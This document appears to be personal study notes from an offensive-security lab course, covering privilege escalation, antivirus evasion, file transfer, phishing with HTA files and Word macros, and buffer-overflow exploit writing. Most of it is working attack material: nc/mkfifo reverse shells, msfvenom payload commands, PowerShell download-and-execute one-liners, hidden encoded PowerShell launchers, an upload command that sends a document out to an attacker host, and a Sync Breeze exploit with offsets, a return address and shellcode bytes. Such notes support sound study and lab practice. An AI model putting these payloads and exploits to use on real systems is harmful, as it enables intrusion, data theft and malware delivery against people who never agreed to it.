Reverse shell cheat sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Reverse shell cheat sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Inspect cron log for running jobs
1 | grep "CRON" /var/log/cron.log |
run every 5 mins
ls -lah to show its permission (rwxrwxrwx)
add following to the script (See Reverse-shell-Cheat-Sheet)
1 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f |
if a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and it takes precedence over the respective entry in /etc/shadow if available
1 | openssl passwd evil |
Lab machine: ssh n00b@10.11.0.129
inspecting the /etc/issue file
1 | uname -r |
1 | searchsploit linux kernel ubuntu 16.04 |
match the architecture of the target machine
Kali linux has some stored in /usr/share/wordlists/
system service binary has insecure permission, we can replace the binary, when the system reboot, the malicious binary will be executed with root permission
1 | Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} |
Service stored in Program Files dir is more prone to have insecure permission
1 | icacls "C:\Program Files\Serviio\bin\ServiioService.exe" |
1 | #include <stdlib.h> |
cross compile it i686-w64-mingw32-gcc adduser.c -o adduser.exe
1 | move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe" |
1 | C:\Users\student> net stop Serviio |
C:\Users\student>wmic service where caption="Serviio" get name, caption, state, startmode Caption Name StartMode State Serviio Serviio Auto Running`
check if user can reboot the system
1 | C:\Users\student>whoami /priv |
disable means the privilege is not enabled for the running process, in our case whoami
1 | shutdown \r \t 0 |
\r reboot, \t in 0 sec
1 | rdesktop xx.xx.xx.xx -u evil -p `password` -g 1024x768 |
check if the new user in admin group
1 | net localgroup Administrators |
can be used in lab 10.11.0.23 -u n00b -p lab
When using file/dir path contain spaces, the developer should make sure it is quoted
1 | C:\Program.exe |
determine the version and architecture
1 | C:\> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" |
try to find third-party driver vulnerabiliies first
1 | driverquery /v |
/v for verbose output
looking for third-party drivers
1 | searchsploit USBPcap |
To begin, we will list the contents of the Program Files directory, in search of the USBPcap directory:
1 | cd "C:\Program Files" |
Use the client machine
setup PATH environment variable
1 | C:\Program Files\mingw-w64\i686-7.2.0-posix-dwarf-rt_v5-rev1> mingw-w64.bat |
windows automated enumeration tool:
1 | c:\Tools\privilege_escalation\windows-privesc-check-master>windows-privesc-check2.exe |
-h help
–dump dump output
-G list groups
Linux:
1 | ./unix-privesc-check standard > output.txt |
Access token assigned to a user
security id (sid) unique to each object including access token, user account, group account.
Integrity mechanism:
From Windows Vista onward, processes run on four integrity levels:
• System integrity process: SYSTEM rights
• High integrity process: administrative rights
• Medium integrity process: standard user rights
• Low integrity process: very restricted rights often used in sandboxed processes
Even logged in as admin, we are operating at Medium integrity level, to switch, specifying run as administrator:
1 | powershell.exe Start-Process cmd.exe -Verb runAs |
run cmd.exe in as administrator
credential prompt and consent prompt
allows an administrator user to bypass UAC by silently elevating our integrity level from medium to high.
leverage an interesting UAC bypass based on fodhelper.exe
1 | C:\Windows\System32\fodhelper.exe |
In order to gather detailed information regarding the fodhelper integrity level and the permissions required to run this process, we will inspect its application manifest
dump the manifest of fohelper.exe:
1 | cd C:\Tools\privilege_escalation\SysinternalsSuite |
1 | <requestedPrivileges> |
enumerating users:whoami work both for win and linux
windows: net user <username>
Linux: id
reveal other users :
windows: net user
linux: cat /etc/passwd
enumeratin hostname:hostname
Windows: systeminfo
linux: cat /etc/issuecat /etc/*-releaseuname -a
tasklist /SVC
/SVC Displays services hosted in each process.
Does not list task run by privieleged users
linux:ps aux
windows:ipconfig /allroute print route informationnetstat -ano network connections
-a display all active tcp connections
-n Displays addresses and port numbers in numerical form.
-o Displays the owning process ID associated with each connection.
Linux:ifconfig -aip a/sbin/routess -anpnetstat -anp
windows:netsh advfirewall show currentprofile
list the firewall rules:netsh advfirewall firewall show rule name=all
Linux: must have root privilege to access firewall rules
For example, the iptables-persistent464 package on Debian Linux saves firewall rules in specific
files under the /etc/iptables directory by default. These files are used by the system to restore
netfilter465 rules at boot time. These files are often left with weak permissions, allowing them to
be read by any local user on the target system.
grep -Hs iptables /etc/*
-H display file name with file number
-s suppress error messages
schtasks /query /fo LIST /v
/query argument displays tasks and /FO LIST sets the output format to a simple list. We can also use /V to request verbose output.
Linux:
The Linux-based job scheduler is known as Cron.467 Scheduled tasks are listed under the /etc/cron.* directories
ls -lah /etc/cron* sometimes need permision
-h human readable
cat /etc/crontab
if those script have a weak permissions, we change change it and escalate pribilege
wmic product get name, version, vendor
We can use wmic with the product WMI class argument followed by get, which, as the name states, is used to retrieve specific property values. We can then choose the properties we are interested in, such as name, version, and vendor
note: product class only list application installed by the windows installer
Similarly, and more importantly, wmic can also be used to list system-wide updates by querying the Win32_QuickFixEngineering (qfe) WMI class.wmic qfe get Caption, Description, HotFixID, InstalledOn
Linux:
Debian based:
dpkg -l
Redhat based:
rpm
Accesschk:
enumerate the Program Files directory in search of any file or directory that allows the Everyone group write permissions
We will use -u to suppress errors, -w to search for write access permissions, and -s to perform a recursive search.
1 | accesschk.exe -uws "Everyone" "C:\Program Files" |
powershell:
1 | Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} |
Linux: -type d to locate directories
1 | find / -writable -type d 2>/dev/null |
mountvol
On Linux-based systems, we can use the mount command to list all mounted filesystems. In addition, the /etc/fstab file lists all drives that will be mounted at boot time.
use lsblk to view all available disks
powershell:
1 | driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path |
find version number of each module:
1 | Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} |
Linux:
1 | lsmod |
modinfo require full path name to run
First, on Windows systems, we should check the status of the AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with elevated privileges.
1 | reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer |
If this setting is enabled, we could craft an MSI file and run it to elevate our privileges
Linux:
find suid-marked binaries, the binary will be executed with the file owner’s permission
1 | find / -perm -u=s -type f 2>/dev/null |
First generate a reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.4 LPORT=4444 -f exe > binary.exe
https://www.virustotal.com/#/home/upload
blacklist technology
a cotinuous series of bytes that uniquely identify it -> change or obfuscating the content
Heuristic-Based Detection is a detection method that relies on various rules and algorithms to determine whether or not an action is considered malicious
Behavioral-Based: This is often achieved by executing the file in question in an emulated environment, such as a small virtual machine, and looking for behaviors or actions that are considered malicious.
Packers, smaller, functional equivalent -> new signiture, bypass older antivirus detection
Re-organize and mutate code, more difficult to reverse engineer , dead code
Add a decryption step, in memory decryotion, invisible to malware detection
virtualmachine emulation detection, detect if it is executed in a virtual machine envrionment
PE injection, manipulation of its own memory, does not write any thing to disk
write their own version of api to load in memory dll
suspend a benign process, then image changed, resume executon
modify memory, inject a hook, handler, to malicious code
Target a specific anti-virus product
1 | $code = ' |
use load code into the memory, then execute with create thread. in powershell script
prevent from execution:
1 | C:\Users\offsec\Desktop> powershell .\av_test.ps1 |
stealth mode: restore the execution of original flow after finish the injected code
Session died after original code exit
we can set up an AutoRunScript to migrate our Meterpreter to a separate process immediately after session creation
1 | set AutoRunScript post/windows/manage/migrate |
searchsploit -m 42341
copy the exploit
mingw-64 a cross-compiler
sudo apt install mingw-w64
make sure the certificate is ignored if face certificate check failed
python request The official documentation394 indicates that the SSL certificate will be ignored if we set the verify
parameter to False
on client, we open a listening shell: nc -nvlp 4444 -e /bin/bash
in attack machine, connect to it nc -nv xxx.xx.xx.xxx 4444
if we run ftp, we lose the interaction, input not binded correctly
nc -nvlp 4444 -e /bin/bash
nc -nv 192.168.148.44 4444
python -c ‘import pty; pty.spawn(“/bin/bash”)’
get a bash prompt, get the pty shell, good
Non-interative ftp download
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
home directory of ftp is set to /ftphome/
1 | C:\Users\offsec>echo open 10.11.0.4 21> ftp.txt |
-v to suppress any returned output, -n to suppresses automatic
login, and -s to indicate the name of our command file.
Use vb script
1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs |
C:\Users\Offsec> cscript wget.vbs http://10.11.0.4/evil.exe evil.exe
Use powershell :
1 | C:\Users\Offsec> echo $webclient = New-Object System.Net.WebClient >>wget.ps1 |
1 | C:\Users\Offsec> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - |
First, we must allow execution of PowerShell scripts (which is restricted by default) with the -
ExecutionPolicy keyword and Bypass value. Next, we will use -NoLogo and -NonInteractive
to hide the PowerShell logo banner and suppress the interactive PowerShell prompt, respectively.
The -NoProfile keyword will prevent PowerShell from loading the default profile (which is not
needed), and finally we specify the script file with -File:
one line version
1 | C:\Users\Offsec> powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://10.11.0.4/evil.exe', 'new-exploit.exe') |
1 | C:\Users\Offsec> powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://10.11.0.4/helloworld.ps1') |
download and execute without save to disk
upx -9 nc.exe compress the binary fileexe2hex -x nc.exe -p nc.cmd
pipling the file into clipboard:
1 | cat nc.cmd | xclip -selection clipboard |
oaste it into the non-interactive shell
host a upload http server
1 | <?php |
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
1 | powershell (New-Object System.Net.WebClient).UploadFile('http://10.11.0.4/upload.php', 'important.docx') |
xp, 2003
sudo chown nobody: /tftp
sudo atftpd –daemon –port 69 /tftp
in windows:
tftp -i 10.11.0.4 put important.docx
Googled for various known external corporate IP addresses and found one on a site that hosts collected user agent data from various affiliate sites.
Cheat HR, by sending their a document, and ask what types of os and broseswer they are using
fingerpringjs
use ajax to post components array to the server
sudo chown www-data:www-data fp
If a file is created with the extension of .hta instead of .html, Internet Explorer will automatically nterpret it as a HTML Application and offer the ability to execute it using the mshta.exe program.
work with IE
Similar to an HTML page, a typical HTML Application includes html, body, and script tags followed by JavaScript or VBScript code. However, since the HTML Application is executed outside the browser we are free to use legacy and dangerous features that are often blocked within the browser
An additional window will open, add close
``
``1 | sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=4444 -f hta-psh -o /var/www/html/evil.hta |
1 | iKqr8BWFyuiK.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcg |
-nop no profile
-w hidden do not pop up a window
-EncodedCommand -e
1 | Sub AutoOpen() |
We must save the containing document as either .docm or the older .doc format, which supports
embedded macros, but must avoid the .docx format, which does not support them.
Insert batch object into a word file
change the present, display as icon, change the icon
Can also change caption
user need to click on the icon to lanuch the batch file
START powershell.exe -nop -w hidden -e JABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBj….
block the execution of macro and embeded object
bypass is to use another Office application.
https://www.securityfocus.com
A vulnerability database instead of exploit database, reference may contain some PoC
https://packetstormsecurity.com
It provides up-to-date information on security news and vulnerabilities as well as recently published tools by security vendors
1 | firefox --search "Microsoft Edge site:exploit-db.com" |
inurl intext and intitle
SearchSploit
1 | sudo apt update && sudo apt install exploitdb |
to make sure it is lateset
/usr/share/exploitdb/exploits/
kali@kali:~$ cd /usr/share/nmap/scripts
kali@kali:/usr/share/nmap/scripts$ grep Exploits *.nse
nmap –script-help=clamav-exec.nse
1 | sudo nmap 10.11.0.128 -p- -sV -vv --open --reason |
–open: Only show open (or possibly open) ports
–reason: Display the reason a port is in a particular state
msf-pattern_create -l 4379
eip = 0x46367046msf-pattern_offset -q 46367046
-q, –query Aa0A Query to Locate
offset = 4368
crash = “\x41” * 4368 + “B” * 4 + “C” * 7
find a register that point to our buffer:
esp point to the end of our buffer, only have 7 bytes remaining in the buffer, increase buffer size not work, lead to another crash
eax point to the start of the buffer, including the “setup sound” string
right click -> go to expression (setup sound)
“se” -> translate to jae jump short if above or equal
“tu” -> je jump if equal
not good
insert first stage shell code at the 7 bytes space
use to allain eax to point to string after setup sound, then jump to there
increase eax+12 as there are 12 chars in “setup sound”
1 | kali@kali:~$ msf-nasm_shell |
5 bytes instructions 83C00C FFE0
1 | padding = "\x41" * 4368 |
We sent the whole range of characters from 00 to FF within our buffer and then monitored
whether any of those bytes got mangled, swapped, dropped, or changed in memory once they
were processed by the application.
0x00 0x20
edb Plugins -> OpcodeSearcher
0x8134596
1 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -b "\x00\x20" -f py -v shellcode |
the output format with
-f, and the variable name to use with -v.
shell is stucked, because of debugger
F2 set break point
F9 to run the program
F7 step into the function
Ctrl + F9 execute until the return of the function
use wireshark to capture packages
capture filter host 192.168.119.148 and host 192.168.148.10
locate the /login page and right click follow tcp stream – apply display filters
TCP View Stored at: C:\Tools\windows_buffer_overflows find the process listening on port 80
Run Immunity Debug with admin
AAAABBBB, then AAAABBCC then AAAABBCD until locate the eip
generate non-repeat patternmsf-pattern_create -l 800
eip replaced with 42306142 -> B0aB
1 | └─$ msf-pattern_offset -l 800 -q 42306142 |
usually shell code length 350 - 400 bytes
esp locate at BBBBCCCCESP!
1 | filler = "A" * 780 |
badchars = (
“\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10”
“\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20”
“\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30”
“\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40”
“\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50”
“\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60”
“\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70”
“\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80”
“\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90”
“\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0”
“\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0”
“\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0”
“\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0”
“\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0”
“\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0”
“\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff” )
inputBuffer = filler + eip + offset + badchars
1 |
|
Log data, item 7
Address=0BADF00D
Message= 0x00400000 | 0x00462000 | 0x00062000 | False | False | False | False | False | -1.0- [syncbrs.exe] (C:\Program Files\Sync Breeze Enterprise\bin\syncbrs.exe)
1 | however the address leading with `0x00` |
Log data, item 10
Address=0BADF00D
Message= 0x10000000 | 0x10223000 | 0x00223000 | False | False | False | False | False | -1.0- [libspp.dll] (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
1 | tip: If this application was compiled with DEP support, our JMP ESP |
kali@kali:~$ msf-nasm_shell
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >
1 | `!mona find -s "\xff\xe4" -m "libspp.dll"` |
Log data, item 3
Address=10090C83
Message= 0x10090c83 : “\xff\xe4” | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
1 |
|
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] =
“\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30”
“\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff”
“\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52”
“\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1”
“\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b”
“\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03”
“\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b”
“\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24”
“\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb”
“\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c”
“\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68”
“\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68”
“\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x77\x94\x68”
“\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61”
“\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2”
“\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6”
“\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44”
“\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56”
“\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff”
“\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6”
“\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb”
“\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5”;
1 | include bad chars |
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d\x25\x26\x2b\x3d”
1 |
|
nops = “\x90” * 10
inputBuffer = filler + eip + offset + nops + shellcode
1 |
sudo nc -lnvp 443
1 |
|
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.148 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b “\x00\x0a\x0d\x25\x26\x2b\x3d”